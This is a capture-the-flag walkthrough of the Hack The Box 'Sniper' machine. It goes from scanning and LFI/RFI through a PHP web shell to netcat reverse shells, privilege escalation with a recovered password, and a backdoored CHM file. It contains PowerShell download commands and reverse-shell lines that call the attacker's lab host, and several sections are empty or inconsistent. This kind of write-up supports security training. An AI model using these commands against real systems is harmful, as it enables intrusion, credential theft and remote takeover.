Hack The Box: Sniper Walkthrough

130n@calvinlai.com

Author: 

Date : 14 Feb 2020

Acknowledgement:

The game cannot be completed without the support of my friends David Au and other member of CTF Playgroup Hong Kong & Macau

Background:

Penetrating Methodology:

Service Scanning

Enumeration

Exploitation

Getting Less Privilege Shell

Walkthrough:

Target machine: 10.10.10.151

Attacking (Hacker) machine: 10.10.14.2

Hacking Process Part 0 – Service Scanning

The target machine IP is 10.10.10.151. Get a basic understanding of the available services of the target machine using nmap aggressive scanning to all available ports.

0.1) Quick Pre-searching

 nmap  10.10.10.151 -oN nmap-htb-sniper-base.txt

0.2) Details Analysis

nmap -sV -p 80 135 139 445 -A -vvv -oN nmap-htb-sniper-detail.txt 10.10.10.151

Enumeration strategies

  1. Check Website Vulnerability  
  2. Check any hidden files/folders of the website
  3. Check the SMB Enumeration
  4. Check the website Enumeration

Hacking Process Part 1 – Enumeration

1.1) Strategy 1 Check Vulnerability

Nikto -- no vulnerability can be abused to bypass authentication.

1.2) Strategy 1 Check any hidden files/folders of the website

python3 /root/Documents/ctf/tools/dirsearch/dirsearch.py -u http://10.10.10.151/ -e php,txt -x 301,302,403,404 --simple-report=sniper.dirsearch

1.3) Strategy 2 SMB Enumeration

enum4linux 10.10.10.151

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/app

1.4) Strategy 3 Web Enumeration

Using SQLMap to check any potential injection vulnerability, but the result is negative.

Try to bruteforce the password for a “guess” user admin.

After several enumerations, it was found that the lang parameters selection option seems to be LFI vulnerable (but not RFI). When I was trying to inject lang=blog-en.php and start my kali location server lang=http://10.10.14.14/fkclai/mannu.php

Future to confirm it is LFI, using the parameters \windows\system32\drivers\etc\hosts

Hacking Process Part 2 – Exploitation

It was found that the “lang” parameter at the URL get request may have LFI vulnerability, but blocked RFI.

2.1) from LFI to RFI to Reverse Shell

Trying to google about the Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction. The useful information was found.

Setup the SAMBA server to remote access

Follow the IndiSHELL instruction to setup

  1. Install SAMBA server using the comment:  apt-get install samba
  2. Create SMB share directory (in my case /root/Documents/ctf/tools/samba/pub/)
  3. Create a configuration file at /etc/samba/smb.conf

  1. Restart the SAMBA server to apply the configuration, using the command :   service smbd restart
  2. Save the following mannu.php at the SAMBA folder. https://raw.githubusercontent.com/incredibleindishell/Mannu-Shell/master/mannu.php

https://github.com/WhiteWinterWolf/wwwolf-php-webshell

Running the PHP Shell 

uname

server_ip

Try to create a file, but failure due to no access rights at the default home folder.

Hacking Process Part 3 – Getting Low Privilege Access

After searching, it was found the following folder can have the file creation access right. Then, we upload the netcat to the folder and create a resvershell using the following commend.

3.1) Save the nc.exe to target machine

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.8:8888/win/nc.exe' -OutFile 'C:\ProgramData\MySQL\mysqlsh\nc.exe '"

3.2) Getting the reverse shell

C:\ProgramData\MySQL\mysqlsh\nc.exe 10.10.14.8 1234 -e powershell.exe

After getting the low privilege access, let's start another enumeration.  Using the access checked provided by the microsoft to check the access rights of account “Chris”

https://docs.microsoft.com/en-us/sysinternals/downloads/access.hk

Secondly, visit the web document root to check any potential information

The DB connection String was found at the db.php. In additional, it was confirmed that the system have a user account “sniper\Chris”

Hacking Process Part 4 – Privilege Escalation

4.1) Privilege escalation from “iusr” to “Chris”

Try to use the database connection string information found at the db.php to connect the reverseShell

 

$pass = convertTo-SecureString '36mEAhz/B8xQ~2VM' -AsPlainText -Force

$cred= New-Object System.Management.Automation.PSCredential("Sniper\Chris",$pass)

Invoke-Command -Computer Sniper -ScriptBlock { pwd } -Credential $cred

Invoke-Command -Computer Sniper -ScriptBlock { dir } -Credential $cred

Invoke-Command -Computer Sniper -ScriptBlock { C:\ProgramData\MySQL\mysqlsh\nc.exe 10.10.14.8 2345 -e powershell.exe } -Credential $cred

4.2) Privilege escalation from “Chris” to “root”

Got the following message at the c:\Docs\note.txt, in addition, there is an instruction.chm file saved at the same folder.

Just thinking about that, create another chm file which contains a reverse shell to replace this instruction.chm and wait for the Sniper CEO to view.

Using the nischang script to create this CHM file....., but no idea why it does not work.

UDownload a Easy CHM tool to create the file using the following HTML

*** Remember to test this chm file locally, and also upload the nc.exe at the Docs folder.

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.14:8888/win/sniper.CHM' -OutFile 'C:\Docs\instructions.chm'"

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.14:8888/win/nc64.exe' -OutFile 'C:\Docs\nc.exe'"

Conclusion...

Reference Link

http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html

https://raw.githubusercontent.com/incredibleindishell/Mannu-Shell/master/mannu.php

https://github.com/incredibleindishell

CHM

https://evi1cg.me/archives/chm_backdoor.html